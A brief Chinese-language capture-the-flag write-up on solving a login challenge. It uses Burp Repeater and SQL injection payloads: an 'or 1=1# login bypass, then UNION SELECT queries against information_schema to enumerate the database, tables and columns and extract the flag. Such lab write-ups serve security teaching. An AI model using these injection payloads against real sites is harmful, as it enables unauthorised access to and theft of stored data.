打开容器,发现一个登陆框
输入admin 密码随便输入,用burp抓包,发送到Repeater模块
首先试试万能密码:’or 1=1# username=admin'or 1=1#&password=123 发现登陆成功
接着查看回显位置:username=admin'or 1=1 union select 1,2,3#&password=123
发现有回显
接着就爆库爆表爆数据
爆库:username=admin'or 1=1 union select 1,database(),3#&password=123
发现数据库位web2
爆表名爆表admin'or 1=1 union select 1,group_concat(table_name),3(1,2,3是回显位置,哪个位置有回显就在哪个地方写group...) from information_schema.tables where table_schema='查询到的数据库名'
成功爆出flag跟user
接着爆字段admin'or 1=1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='要查询的字段名'
发现flag字段
接下来就直接查找flag字段下面的数据
爆数据admin'or 1=1 union select 1,要爆的数据,3 from 爆出的字段名
成功拿到flag